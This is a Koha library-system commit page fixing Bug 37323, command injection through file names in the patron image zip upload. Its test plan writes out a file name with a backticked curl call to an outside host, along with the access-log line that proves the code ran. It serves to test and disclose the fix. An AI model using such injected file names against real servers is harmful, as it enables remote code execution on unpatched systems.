git.koha-community.org Git - koha.git/commit

author	Amit Gupta <amit.gupta@informaticsglobal.com>
	Thu, 11 Jul 2024 17:43:06 +0000 (23:13 +0530)
committer	Tomas Cohen Arazi <tomascohen@theke.io>
	Tue, 13 Aug 2024 14:05:28 +0000 (11:05 -0300)
commit	4da9bd00e1d393619499b038ff1471f70c1a6bc3
tree	48566b9b7c8c7d93da816b8161d010129e6ccb9f	tree \| snapshot
parent	e0211501384a72481ade9d6ca74162b7d7059dd7	commit \| diff

Bug 37323: Escape characters in patron image picture upload

To Test
1. Create a file name for example: test.zip`curl xxxxtesting.informaticsglobal.com`.zip
where the domain is one you can watch the logs from.
2. Go to Tools and click on Upload patron images choose option zip file and upload the file.
3. Check /var/log/apache2/access.log and see the curl with the IP
"xx.xxx.xx.xxx - - [11/Jul/2024:23:10:33 +0530] "GET / HTTP/1.1" 200 267 "-" "curl/7.68.0"
4. Apply the patch
5. Repeat 2 and 3 step and check no error is coming for the Remote execution error.
6. Test uploading actual zip file and images still works.

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>